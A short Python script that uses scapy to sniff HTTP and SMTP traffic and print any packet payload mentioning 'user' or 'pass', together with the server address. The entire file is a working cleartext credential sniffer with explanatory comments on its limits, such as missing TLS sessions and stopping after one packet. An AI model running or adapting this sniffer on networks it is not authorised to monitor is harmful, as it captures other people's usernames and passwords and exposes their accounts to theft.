#coding:utf-8 

from scapy.all import *
# Sniff data on fixed ports: 80 HTTP, 25 SMTP, 143 IMAP
# p[IP].dst: the destination IP address of the packet


def c(p):
	"""Print a captured TCP segment whose payload mentions "user" or "pass".

	Used as the ``prn`` callback of scapy's ``sniff``; *p* is the captured
	packet and is indexed by its TCP and IP layers, so both must be present.

	The check is a case-insensitive substring match on the segment data, so
	it also fires on unrelated text such as an HTTP ``User-Agent`` header.
	It only finds anything when the protocol is carried in cleartext:
	sessions protected by TLS do not expose these strings on the wire.
	The full matching payload is written to stdout, credentials included.
	"""
	segment = p[TCP].payload
	if not segment:
		# Nothing above the TCP header to inspect.
		return

	# str() of the payload gives the raw TCP data; p.show() output is much
	# harder to read for this purpose.
	mp = str(segment)
	lowered = mp.lower()
	if "user" not in lowered and "pass" not in lowered:
		return

	# A single parenthesised argument prints the same text as the original
	# two-item Python 2 print statement (items joined by one space).
	print("%s %s" % ("[*] p[TCP].payload: ", mp))
	print("[*] Connect server: %s" % p[IP].dst)
if __name__ == '__main__':
	# BPF capture filter: cleartext HTTP (80) and SMTP (25) only.
	# Port 143 is named in the file's comments but is not captured here.
	capture_filter = "tcp port 80 or tcp port 25"
	# count=1 makes sniff() return after one packet that passes the filter;
	# c is called on that packet.
	sniff(filter=capture_filter, prn=c, count=1)

# 80 HTTP, 25 SMTP, 143 IMAP
